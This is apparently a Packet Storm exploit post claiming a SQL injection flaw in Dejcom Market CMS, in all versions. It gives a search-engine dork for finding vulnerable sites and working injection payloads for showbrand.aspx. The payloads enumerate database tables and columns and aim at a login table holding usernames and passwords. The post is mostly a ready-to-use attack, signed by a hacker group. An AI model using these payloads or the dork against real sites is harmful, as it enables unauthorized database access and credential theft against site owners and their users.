Dejcom Market CMS suffers from a remote SQL injection vulnerability.
158d215d0e002d3c349717d677b9c8aae78528ade6f8531bc7aa2e66da56bf32# Exploit Title: [Dejcom Market Cms SQL injection]
# Date: [01/12/2010]
# Author: [Mormoroth]
# Dork : "Powered By Dejcom Market CMS"
# Version: [ALL Version]
Exploit:
%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge','COMMENTS','filegroup','files','groups','khabarname','khat','links','login'))--
showbrand.aspx?bc=%27 or 1=(select top 1 column_name from information_schema.columns where table_name='loguser' and column_name not in('code','username','pass'))--
Demo : http://server/showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge'))--
---------------------
Persian Gulf forever
ISCN TEAM
We are Mormoroth - Magicboy
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed